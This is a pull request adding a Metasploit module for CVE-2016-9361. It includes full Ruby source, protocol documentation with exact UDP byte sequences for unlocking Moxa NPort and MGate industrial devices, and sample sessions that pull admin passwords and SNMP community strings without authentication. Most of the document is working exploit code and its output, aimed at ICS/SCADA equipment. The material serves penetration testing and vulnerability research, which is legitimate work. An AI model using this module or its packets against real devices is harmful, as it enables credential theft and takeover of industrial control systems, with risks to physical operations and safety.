### PR TITLE
Add Moxa Credential Recovery Module (CVE-2016-9361)

### DIFF
--- a/documentation/modules/auxiliary/admin/scada/moxa_credentials_recovery.md
+++ b/documentation/modules/auxiliary/admin/scada/moxa_credentials_recovery.md
@@ -1,0 +1,177 @@
+## Vulnerable Application
+  Many Moxa devices make use of a protocol that is vulnerable to unauthenticated credential retrieval via exploitation of CVE-2016-9361.  The service is known 
+  to be used on Moxa devices in the NPort, OnCell, and MGate product lines.
+  
+  This module leverages CVE-2016-9361 to retrieve admin passwords and SNMP 
+  community strings, as well as enumerate all possible function codes.  The supporting research and Metasploit module are the work of Patrick DeSantis 
+  of Cisco Talos and K. Reid Wightman.
+
+  The module has been tested on Moxa NPort 6250 firmware v1.13, MGate MB3170 
+  firmware v2.5, and NPort 5110 firmware v2.6.
+
+### The Moxa Protocol
+  The Moxa protocol listens on 4800/UDP and will respond to broadcast or direct traffic.  The protocol is utilized by devices in several product lines and 
+  Moxa applications in order to manage and configure network-deployed devices.
+
+#### Discovery / Identify
+  A discovery packet compels a Moxa device to respond to the sender with some
+  basic device information that is needed for more advanced functions.  The 
+  discovery data is 8 bytes in length and is the most basic example of the Moxa protocol.  It may be sent out as a broadcast (destination 255.255.255.255) or
+  to an individual device.
+
+  The discovery request contains the bytes:
+```
+  \x01\x00\x00\x08\x00\x00\x00\x00
+```
+  Where the function code (first byte) 0x01 is Moxa discovery/identify
+  and the fourth byte is the length of the full data payload.
+
+##### Discovery Response
+  A valid response is 24 bytes, starts with 0x81, and contains the values
+  0x00, 0x90, 0xe8 (the Moxa OIU) in bytes 14, 15, and 16.
+  
+  A response with a value of 0x04 for the second byte indicates that an invalid
+  function code was used in the corresponding request.
+
+  The response can be broken down as follows:
+
+  * Byte 0x0 identifies the packet as a response to the request. The first byte of a response will always be the FC + 0x80 (the most significant bit of the byte is set to 1, so 0b00000001 becomes 0b10000001, or 0x81 as response to identify 0x01).
+  * Bytes 0x1-0x2 are unknown, may be padding
+  * Byte 0x3 is the length of the datagram payload
+  * Bytes 0x4-0x7 are unknown, may be padding
+  * Bytes 0x8-0x9 may be the product line in little endian.  For example, an NPort 6250 is part of the 6000 line, so bytes 8 and 9 will be 0x00 and 0x60 respectively.
+  * Bytes 0xA-0xB are unknown but always seem to be 0x00 and 0x80 respectively.
+  * Bytes 0xC-0xD are the model number in little endian, so the NPort 6250 is 0x50 and 0x62 respectively.
+  * Bytes 0xE-0x13 are the MAC address of the device
+  * Bytes 0x14-0x17 are the IP address
+
+  Here's a sample response from an NPort 6250 with the default IP address of 192.168.127.254 and a MAC of 00:90:e8:15:1c:22:
+```
+  0000  81  00  00  18  00  00  00  00  00  60  00  80  50  62  00  90
+  0010  e8  15  1c  22  c0  a8  7f  fe	 	 	 	 	 	 	 	 
+
+  Model:  0x50 0x60 = 6250
+  MAC:  00:90:e8:15:1c:22
+  IP: c0:a8:7f:fe = 192.168.127.254
+```
+#### Other Functions
+  The values from the response are then used to craft a new request with the below format:
+
+  * Byte 0x0 is the function code
+  * Bytes 0x1-0x2 are unknown, may be padding
+  * Byte 0x3 is the length of the datagram payload
+  * Bytes 0x4-0x7 are unknown, may be padding
+  * Bytes 0x8-0x9 are the product line in little endian
+  * Bytes 0xA-0xB are the unknown 0x00 0x80
+  * Bytes 0xC-0xD is the model number in big endian
+  * Bytes 0xE-0x13 is the MAC
+
+  The module takes a valid response from discovery/ident and parses out the appropriate bytes to use as a "tail" which is appended to all subsequent requests.
+```
+  tail = response[8..24]
+```
+  The tail is then used as shown below:
+```
+  datagram = fc[func] + "\x00\x00\x14\x00\x00\x00\x00" + tail
+```
+  For all function codes other than identify (0x01), as long as the "tail" values in the request match those of the target, the device will execute the function defined by the value in byte 0x0.
+
+##### Other Known and Suspected Function Codes
+  Function codes fall in the range of 0x01 to 0x7F.
+
+  The below function codes are included in the module, even if unused.  The intent is that the user may modify the module as needed to make use of other function codes.
+```
+  'ident'         =>  "\x01",   # identify device
+  'name'          =>  "\x10",   # get the "server name" of the device
+  'netstat'       =>  "\x14",   # network activity of the device
+  'unlock1'       =>  "\x16",   # "unlock" some devices, including 5110, MGate
+  'date_time'     =>  "\x1a",   # get the device date and time
+  'time_server'   =>  "\x1b",   # get the time server of device
+  'unlock2'       =>  "\x1e",   # "unlock" 6xxx series devices
+  'snmp_read'     =>  "\x28",   # snmp community strings
+  'pass'          =>  "\x29",   # admin password of some devices
+  'all_creds'     =>  "\x2c",   # snmp comm strings and admin password of 6xxx
+```
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: ```use auxiliary/admin/scada/moxa_credentials_recovery```
+  3. Do: ```set RHOST <target IP>```
+  4. Do: ```run```
+  5. Any found credentials will be stored in loot (set VERBOSE to TRUE to have credentials output to console)
+
+## Options
+
+  **RHOST**
+
+  Target device.
+
+  **FUNCTION**
+
+  Either CREDS (default) or ENUM:
+  * CREDS attempts to retrieve administrative password and SNMP community strings
+  * ENUM will enumerate all function codes in the range 0x2..0x7F
+
+## Scenarios
+### Check
+  The module implements a check function to determine if a target "speaks" the Moxa protocol.  It does this using the 0x01 function code and checking for a valid response of 24 bytes, starting with 0x81, and containing the values 0x00, 0x90, 0xe8 (the Moxa OIU) in bytes 14, 15, and 16.
+```
+if response[0] == "\x81" && response[14..16] == "\x00\x90\xe8" && response.length == 24
+```
+### Output Hexdump to Console
+  To output hexdump responses to console:
+  ```
+  msf > use auxiliary/admin/scada/moxa_credentials_recovery
+  msf auxiliary(moxa_credentials_recovery) > set RHOST <target IP>
+  msf auxiliary(moxa_credentials_recovery) > set VERBOSE TRUE
+  msf auxiliary(moxa_credentials_recovery) > run
+  ```
+  Sample verbose output:
+  ```
+  ... SNIP...
+  [*] Response:
+  90 00 00 3c 00 00 00 00 00 60 00 80 50 62 00 90    |...<.....`..Pb..|
+  e8 15 1c 22 4e 50 36 32 35 30 5f 35 38 39 36 00    |..."NP6250_5896.|
+  10 00 11 00 12 00 13 00 14 00 15 00 16 00 17 00    |................|
+  18 00 19 00 1a 00 1b 00 1c 00 1d 00                |............|
+  ... SNIP ...
+
+  [*] snmp community retrieved: public_admin
+  [*] snmp read/write community retrieved: private_admin
+  [*] password retrieved: secretpassword
+  ... SNIP ...
+  ```
+
+### Enumerate All Function Codes
+  To enumerate ALL function codes :
+
+  ```
+  msf > use auxiliary/admin/scada/moxa_credentials_recovery
+  msf auxiliary(moxa_credentials_recovery) > set RHOST <target IP>
+  msf auxiliary(moxa_credentials_recovery) > set FUNCTION ENUM
+  msf auxiliary(moxa_credentials_recovery) > run
+  ```
+  Sample ENUM output:
+  ```
+  ... SNIP...
+  [*] Function Code: 14    |.|
+
+
+  [*] Response:
+  94 00 01 08 00 00 00 00 00 60 00 80 50 62 00 90    |.........`..Pb..|
+  e8 15 1c 22 0f 00 00 00 00 00 00 00 00 00 00 00    |..."............|
+  00 00 00 00 00 00 00 00 00 00 00 00 c0 a8 7f fe    |................|
+  00 00 c0 12 00 00 ff 00 00 00 00 00 00 00 00 00    |................|
+  00 00 a1 00 00 00 00 00 00 00 00 00 c0 a8 7f fe    |................|
+  00 00 89 00 00 00 00 00 00 00 00 00 c0 a8 7f fe    |................|
+  00 00 24 13 01 01 ff 00 00 00 00 00 00 00 00 00    |..$.............|
+  00 00 b5 03 00 00 00 00 00 00 00 00 c0 a8 7f fe    |................|
+  00 00 34 3a 01 01 00 00 00 00 00 00 c0 a8 7f fe    |..4:............|
+  00 00 17 00 01 01 00 00 00 00 00 00 c0 a8 7f fe    |................|               
+  ... SNIP ...
+
+  ```
+  Note that the above response is an example of the utility of using ENUM.  This function code (0x14) returns a netstat-type response.  Output similar to the above will be displayed for every function code that does not return 'invalid' (0x4).  This may also be useful for devices that do not "unlock" using the function codes supplied in this module; by running through all function codes in sequence, it is likely that an alternate "unlock" function will be sent prior to any function codes that request credentials.
+
+  NOTE: As the protocol is undocumented and the purpose of a majority of the function codes are unknown, undesired results are possible.  Do NOT use on devices which are mission-critical!

--- a/modules/auxiliary/admin/scada/moxa_credentials_recovery.rb
+++ b/modules/auxiliary/admin/scada/moxa_credentials_recovery.rb
@@ -1,0 +1,256 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::Udp
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Moxa Device Credential Retrieval',
+      'Description'    => %q{
+        The Moxa protocol listens on 4800/UDP and will respond to broadcast
+        or direct traffic.  The service is known to be used on Moxa devices
+        in the NPort, OnCell, and MGate product lines.  Many devices with
+        firmware versions older than 2017 or late 2016 allow admin credentials
+        and SNMP read and read/write community strings to be retrieved without
+        authentication.
+
+        This module is the work of Patrick DeSantis of Cisco Talos K. Reid
+        Wightman.
+
+        Tested on: Moxa NPort 6250 firmware v1.13, MGate MB3170 firmware 2.5,
+        and NPort 5110 firmware 2.6.
+
+      },
+      'Author'         =>
+        [
+          'Patrick DeSantis <p[at]t-r10t.com>',
+          'K. Reid Wightman <reid[at]revics-security.com>'
+        ],
+
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2016-9361'],
+          [ 'BID', '85965'],
+          [ 'URL', 'https://www.digitalbond.com/blog/2016/10/25/serial-killers/'],
+          [ 'URL', 'https://github.com/reidmefirst/MoxaPass/blob/master/moxa_getpass.py' ],
+          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-336-02']
+        ],
+      'DisclosureDate' => 'Jul 28 2015'))
+
+    register_options([
+      # Moxa protocol listens on 4800/UDP by default
+      Opt::RPORT(4800),
+      OptEnum.new("FUNCTION", [true, "Pull credentials or enumerate all function codes", "CREDS",
+        [
+          "CREDS",
+          "ENUM"
+        ]])
+      ], self.class)
+  end
+
+  def fc() {
+    # Function codes
+    'ident'         =>  "\x01",   # identify device
+    'name'          =>  "\x10",   # get the "server name" of the device
+    'netstat'       =>  "\x14",   # network activity of the device
+    'unlock1'       =>  "\x16",   # "unlock" some devices, including 5110, MGate
+    'date_time'     =>  "\x1a",   # get the device date and time
+    'time_server'   =>  "\x1b",   # get the time server of device
+    'unlock2'       =>  "\x1e",   # "unlock" 6xxx series devices
+    'snmp_read'     =>  "\x28",   # snmp community strings
+    'pass'          =>  "\x29",   # admin password of some devices
+    'all_creds'     =>  "\x2c",   # snmp comm strings and admin password of 6xxx
+    'enum'          =>  "enum"    # mock fc to catch "ENUM" option
+  }
+  end
+
+  def send_datagram(func, tail)
+    if fc[func] == "\x01"
+      # identify datagrams have a length of 8 bytes and no tail
+      datagram = fc[func] + "\x00\x00\x08\x00\x00\x00\x00"
+      begin
+        udp_sock.put(datagram)
+        response = udp_sock.get(3)
+      rescue ::Timeout::Error
+      end
+      format_output(response)
+      # the last 16 bytes of the ident response are used as a form of auth for
+      # function codes other than 0x01
+      tail = response[8..24]
+    elsif fc[func] == "enum"
+      for i in ("\x02".."\x80") do
+        # start at 2 since 0 is invalid and 1 is ident
+        datagram = i + "\x00\x00\x14\x00\x00\x00\x00" + tail
+        begin
+          udp_sock.put(datagram)
+          response = udp_sock.get(3)
+        end
+        if response[1] != "\x04"
+          vprint_status("Function Code: #{Rex::Text.to_hex_dump(datagram[0])}")
+          format_output(response)
+        end
+      end
+    else
+      # all non-ident datagrams have a len of 14 bytes and include a tail that
+      # is comprised of bytes obtained during the ident
+      datagram = fc[func] + "\x00\x00\x14\x00\x00\x00\x00" + tail
+      begin
+        udp_sock.put(datagram)
+        response = udp_sock.get(3)
+        if valid_resp(fc[func], response) == -1
+          # invalid response, so don't bother trying to parse it
+          return
+        end
+        if fc[func] == "\x2c"
+          # try this, note it may fail
+          get_creds(response)
+        end
+        if fc[func] == "\x29"
+        # try this, note it may fail
+        get_pass(response)
+        end
+        if fc[func] == "\x28"
+        # try this, note it may fail
+        get_snmp_read(response)
+        end
+      rescue ::Timeout::Error
+      end
+      format_output(response)
+    end
+  end
+
+  # helper function for extracting strings from payload
+  def get_string(data)
+    str_end = data.index("\x00")
+    return data[0..str_end]
+  end
+
+  # helper function for extracting password from 0x29 FC response
+  def get_pass(response)
+    if response.length() < 200
+      print_status("get_pass failed: response not long enough")
+      return
+    end
+    pass = get_string(response[200..-1])
+    print_status("password retrieved: #{pass}")
+    store_loot("moxa.get_pass.admin_pass", "text/plain", rhost, pass)
+    return pass
+  end
+
+  # helper function for extracting snmp community from 0x28 FC response
+  def get_snmp_read(response)
+    if response.length() < 24
+      print_status("get_snmp_read failed: response not long enough")
+      return
+    end
+    snmp_string = get_string(response[24..-1])
+    print_status("snmp community retrieved: #{snmp_string}")
+    store_loot("moxa.get_pass.snmp_read", "text/plain", rhost, snmp_string)
+  end
+
+  # helper function for extracting snmp community from 0x2C FC response
+  def get_snmp_write(response)
+    if response.length() < 64
+      print_status("get_snmp_write failed: response not long enough")
+      return
+    end
+    snmp_string = get_string(response[64..-1])
+    print_status("snmp read/write community retrieved: #{snmp_string}")
+    store_loot("moxa.get_pass.snmp_write", "text/plain", rhost, snmp_string)
+  end
+
+  # helper function for extracting snmp and pass from 0x2C FC response
+  # Note that 0x2C response is basically 0x28 and 0x29 mashed together
+  def get_creds(response)
+    if response.length() < 200
+      # attempt failed. device may not be unlocked
+      print_status("get_creds failed: response not long enough. Will fall back to other functions")
+      return -1
+    end
+    get_snmp_read(response)
+    get_snmp_write(response)
+    get_pass(response)
+  end
+
+  # helper function to verify that the response was actually for our request
+  # Simply makes sure the response function code has most significant bit
+  # of the request number set
+  # returns 0 if everything is ok
+  # returns -1 if functions don't match
+  def valid_resp(func, resp)
+    # get the query function code to an integer
+    qfc = func.unpack("C")[0]
+    # make the response function code an integer
+    rfc = resp[0].unpack("C")[0]
+    if rfc == (qfc + 0x80)
+      return 0
+    else
+      return -1
+    end
+  end
+
+  def format_output(resp)
+    # output response bytes as hexdump
+    vprint_status("Response:\n#{Rex::Text.to_hex_dump(resp)}")
+  end
+  def check
+    connect_udp
+
+    begin
+      # send the identify command
+      udp_sock.put("\x01\x00\x00\x08\x00\x00\x00\x00")
+      response = udp_sock.get(3)
+    end
+
+    if response
+      # A valid response is 24 bytes, starts with 0x81, and contains the values
+      # 0x00, 0x90, 0xe8 (the Moxa OIU) in bytes 14, 15, and 16.
+      if response[0] == "\x81" && response[14..16] == "\x00\x90\xe8" && response.length == 24
+        format_output(response)
+        return Exploit::CheckCode::Appears
+      end
+    else
+      vprint_error("Unknown response")
+      return Exploit::CheckCode::Unknown
+    end
+    cleanup
+  end
+
+  def run
+    function = datastore["FUNCTION"]
+
+    connect_udp
+
+    # identify the device and get bytes for the "tail"
+    tail = send_datagram('ident', nil)
+
+    # get the "server name" from the device
+    send_datagram('name', tail)
+
+    # "unlock" the device
+    # We send both versions of the unlock FC, this doesn't seem
+    # to hurt anything on any devices tested
+    send_datagram('unlock1', tail)
+    send_datagram('unlock2', tail)
+
+    if function == "CREDS"
+      # grab data
+      send_datagram('all_creds', tail)
+      send_datagram('snmp_read', tail)
+      send_datagram('pass', tail)
+    elsif function == "ENUM"
+      send_datagram('enum', tail)
+    else
+      print_error("Invalid FUNCTION")
+    end
+
+    disconnect_udp
+  end
+end

--- a/modules/auxiliary/admin/scada/moxa_credentials_recovery.rb
+++ b/modules/auxiliary/admin/scada/moxa_credentials_recovery.rb
@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
-
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::Udp
   include Msf::Auxiliary::Report
@@ -52,7 +50,7 @@ class MetasploitModule < Msf::Auxiliary
           "CREDS",
           "ENUM"
         ]])
-      ], self.class)
+      ])
   end
 
   def fc() {


### PR DESCRIPTION
This pull request  leverages CVE-2016-9361 to retrieve admin passwords and SNMP community strings, as well as enumerate all possible function codes on many Moxa devices.  Moxa devices are primarily used in ICS/SCADA environments.  Retrieved credentials are stored in loot and can be displayed on terminal using verbose output.

The supporting research and Metasploit module are the work of Patrick DeSantis (@pat-riot) of Cisco Talos and K. Reid Wightman (@reidmefirst).  The module has been tested on Moxa NPort 6250 firmware v1.13, MGate MB3170 firmware v2.5, and NPort 5110 firmware v2.6.  

PCAPs of the module in action against multiple Moxa devices will be sent to msfdev@metasploit.com to facilitate validation.  Docs detailing the protocol and module are included with this PR.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use auxiliary/admin/scada/moxa_credentials_recovery`
- [ ] `set RHOST <target IP>`
- [ ] Optional: `set VERBOSE TRUE`
- [ ] `run`

```
 msf auxiliary(moxa_credentials_recovery) > run

[*] Response:
81 00 00 18 00 00 00 00 00 60 00 80 50 62 00 90    |.........`..Pb..|
e8 15 1c 22 c0 a8 7f fe                            |..."....|

[*] Response:
90 00 00 3c 00 00 00 00 00 60 00 80 50 62 00 90    |...<.....`..Pb..|
e8 15 1c 22 4e 50 36 32 35 30 5f 35 38 39 36 00    |..."NP6250_5896.|
10 00 11 00 12 00 13 00 14 00 15 00 16 00 17 00    |................|
18 00 19 00 1a 00 1b 00 1c 00 1d 00                |............|

[*] Response:
96 00 00 24 00 00 00 00 00 60 00 80 50 62 00 90    |...$.....`..Pb..|
e8 15 1c 22 00 00 13 01 00 00 04 01 08 17 00 00    |..."............|
01 00 03 00                                        |....|

[*] snmp community retrieved: public_admin
[*] snmp read/write community retrieved: private_admin
[*] password retrieved: secretpassword

[*] Response:
ac 00 01 08 00 00 00 00 00 60 00 80 50 62 00 90    |.........`..Pb..|
e8 15 1c 22 00 a8 7f 48 70 75 62 6c 69 63 5f 61    |..."...Hpublic_a|
64 6d 69 6e 00 62 00 03 a6 e6 97 56 16 00 17 00    |dmin.b.....V....|
18 00 19 00 00 60 00 03 af 88 03 00 fd ff 0d 80    |.....`..........|
70 72 69 76 61 74 65 5f 61 64 6d 69 6e 00 27 00    |private_admin.'.|
28 00 29 00 2a 00 2b 00 2c 00 2d 00 2e 00 2f 00    |(.).*.+.,.-.../.|
30 00 31 00 32 00 33 00 70 75 62 6c 69 63 5f 61    |0.1.2.3.public_a|
64 6d 69 6e 00 00 3b 00 3c 00 3d 00 3e 00 3f 00    |dmin..;.<.=.>.?.|
40 00 41 00 42 00 43 00 44 00 45 00 46 00 47 00    |@.A.B.C.D.E.F.G.|
00 00 49 00 4a 00 4b 00 4c 00 4d 00 4e 00 4f 00    |..I.J.K.L.M.N.O.|
50 00 51 00 52 00 53 00 54 00 55 00 56 00 57 00    |P.Q.R.S.T.U.V.W.|
58 00 59 00 5a 00 5b 00 00 00 5d 00 5e 00 5f 00    |X.Y.Z.[...].^._.|
60 00 61 00 62 00 63 00 73 65 63 72 65 74 70 61    |`.a.b.c.secretpa|
73 73 77 6f 72 64 00 00 6c 00 6d 00 6e 00 6f 00    |ssword..l.m.n.o.|
00 00 71 00 72 00 73 00 74 00 75 00 76 00 77 00    |..q.r.s.t.u.v.w.|
78 00 79 00 7a 00 7b 00 7c 00 7d 00 7e 00 7f 00    |x.y.z.{.|.}.~...|
80 00 81 00 82 00 83 00                            |........|

[*] snmp community retrieved: public_admin

[*] Response:
a8 00 00 b8 00 00 00 00 00 60 00 80 50 62 00 90    |.........`..Pb..|
e8 15 1c 22 00 a8 7f fe 70 75 62 6c 69 63 5f 61    |..."....public_a|
64 6d 69 6e 00 62 00 03 a6 e6 97 56 16 00 17 00    |dmin.b.....V....|
18 00 19 00 00 60 00 03 af 88 03 00 fd ff 0d 80    |.....`..........|
00 72 69 76 61 74 65 5f 61 64 6d 69 6e 00 27 00    |.rivate_admin.'.|
28 00 29 00 2a 00 2b 00 2c 00 2d 00 2e 00 2f 00    |(.).*.+.,.-.../.|
30 00 31 00 32 00 33 00 00 75 62 6c 69 63 5f 61    |0.1.2.3..ublic_a|
64 6d 69 6e 00 00 3b 00 3c 00 3d 00 3e 00 3f 00    |dmin..;.<.=.>.?.|
40 00 41 00 42 00 43 00 44 00 45 00 46 00 47 00    |@.A.B.C.D.E.F.G.|
00 00 49 00 4a 00 4b 00 4c 00 4d 00 4e 00 4f 00    |..I.J.K.L.M.N.O.|
50 00 51 00 52 00 53 00 54 00 55 00 56 00 57 00    |P.Q.R.S.T.U.V.W.|
58 00 59 00 5a 00 5b 00                            |X.Y.Z.[.|

[*] get_pass failed: response not long enough

[*] Response:
a9 04 00 14 00 00 00 00 00 60 00 80 50 62 00 90    |.........`..Pb..|
e8 15 1c 22                                        |..."|

[*] Auxiliary module execution completed
```